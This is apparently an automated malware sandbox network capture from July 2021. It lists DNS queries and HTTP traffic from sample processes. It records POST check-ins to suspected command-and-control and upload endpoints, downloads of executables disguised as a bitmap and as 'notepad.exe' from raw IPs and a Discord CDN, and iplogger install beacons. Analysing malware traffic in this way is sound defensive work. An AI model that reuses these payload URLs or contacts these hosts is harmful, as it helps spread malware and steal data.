                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        howdycash.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:36 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07abbf5c00000b433111c000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=SuI960pmCIBl1fiBlPEmXTm%2FVeLXiO%2BXAoU5Rv%2BVBmyepUtroNjOVm88VB3wLZJOa7sLDt8639k5A3eKiG7nhal8wtpAYpRQ1QfOOHX3ZUu%2FMgL2Mqjm601pxQqr7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668615789b5b0b43-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        220.125.1.129
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        210.180.252.88
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        90.191.200.51
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        109.102.255.230
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        187.156.139.53
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        58.228.68.101
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        186.6.236.46
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        211.108.106.8
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        109.98.58.98
                                                                                                                                                                                        lahuertasonora.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        88.158.247.38
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 271
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:41 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 203
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:44 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 310
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:47 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:47 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07abeb2900007cb8578ba000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=jcD0hf2ouPRgkreN9sof1%2BmxubMtcV7CS5ftsv8mP4LGjYj96GB2GLavoujA3IjTrR88XYRWrD9yeGs%2FzaJOTzFjiLAMg5N%2FHaIl3Gk5EcTulLn4Ic3lNw0TRLspNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668615bea8577cb8-MUC
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:51 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 230
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:55 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 165
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:01 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 56
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:00 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ac1d9900004c08eb2dc000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Jhzu5tGfja0lryJ3zJf3P4ahxBNotp5Hq8Au04AWrZH0ihQoinBTJP8BWdsGO041hVIsPmGMh8wuCskkdPOwilPIWZZQpLkv%2BlyDWQuxYKeLBVKCjE8Zua2E67yemA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686160f5a494c08-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/855697945679888404/860411175945895936/file3.bmp
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        162.159.135.233:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /attachments/855697945679888404/860411175945895936/file3.bmp HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:04 GMT
                                                                                                                                                                                        Content-Type: image/x-ms-bmp
                                                                                                                                                                                        Content-Length: 275968
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Ray: 66861629caa7d10d-TXL
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Age: 29
                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                        Content-Disposition: attachment;%20filename=file3.bmp
                                                                                                                                                                                        ETag: "7f0c94a1625791b04fb44f1e2059ba82"
                                                                                                                                                                                        Expires: Sat, 02 Jul 2022 07:16:04 GMT
                                                                                                                                                                                        Last-Modified: Fri, 02 Jul 2021 06:46:50 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                        Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        x-goog-generation: 1625208410070785
                                                                                                                                                                                        x-goog-hash: crc32c=OAqU0w==
                                                                                                                                                                                        x-goog-hash: md5=fwyUoWJXkbBPtE8eIFm6gg==
                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                        x-goog-stored-content-length: 275968
                                                                                                                                                                                        X-GUploader-UploadID: ADPycdu2RMDMUxHRj5bNxRHD4T9mkgQCVzjDg03U_SEuJ8uHSXOBBwpTK1s-P2T66VF8oFejkjp9MT2g7FjGSHwmoeL02wkzOA
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NZX1z2tBLx88cjFD6nSXyegb71kUaAcwY0rwJ%2FK%2FpNPjId3rzqyP%2BgYTSg7k8bBeVxpOBTuoDCC%2Bm0XC0bBBuRhg0OBFR5Rtv97OPBf%2B1Zqh6a9CkxXSOBPgu4HgTR4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://152.89.247.174/blog/files/notepad.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        152.89.247.174:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /blog/files/notepad.exe HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Host: 152.89.247.174
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:05 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 10:36:26 GMT
                                                                                                                                                                                        ETag: "b1201-5c60d6946db00"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 725505
                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/WW/file6.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /WW/file6.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:08 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Thu, 01 Jul 2021 08:23:41 GMT
                                                                                                                                                                                        ETag: "5fd88-5c60b8e869d95"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 392584
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://136.144.41.201/WW/file3.exe
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        136.144.41.201:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /WW/file3.exe HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: 136.144.41.201
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:13 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Last-Modified: Fri, 02 Jul 2021 07:04:22 GMT
                                                                                                                                                                                        ETag: "a54c8-5c61e90b9eba8"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 677064
                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        iplogger.com
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        iplogger.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        iplogger.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        88.99.66.31
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.com/1Fb797
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /1Fb797 HTTP/1.1
                                                                                                                                                                                        User-Agent: Installed OK 5.0/3
                                                                                                                                                                                        Host: iplogger.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:13 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=i1s8a3r6f9pbt2s5r6kpfoigg5; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=51.210.80.127; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253838017; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers:
                                                                                                                                                                                        whoami: 532db424391f6456d723160c1e096655ae07f0b562c5c2b1f0a05486354840ad
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.com/1Fn797
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /1Fn797 HTTP/1.1
                                                                                                                                                                                        User-Agent: Installed OK 5.0/3
                                                                                                                                                                                        Host: iplogger.com
                                                                                                                                                                                        Cookie: PHPSESSID=i1s8a3r6f9pbt2s5r6kpfoigg5; clhf03028ja=51.210.80.127
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:17 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=51.210.80.127; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253838014; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 2
                                                                                                                                                                                        whoami: 532db424391f6456d723160c1e096655ae07f0b562c5c2b1f0a05486354840ad
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        clients2.google.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        clients2.google.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        clients2.google.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        clients.l.google.com
                                                                                                                                                                                        clients.l.google.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.217.20.78
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        accounts.google.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        accounts.google.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        accounts.google.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        216.58.208.109
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
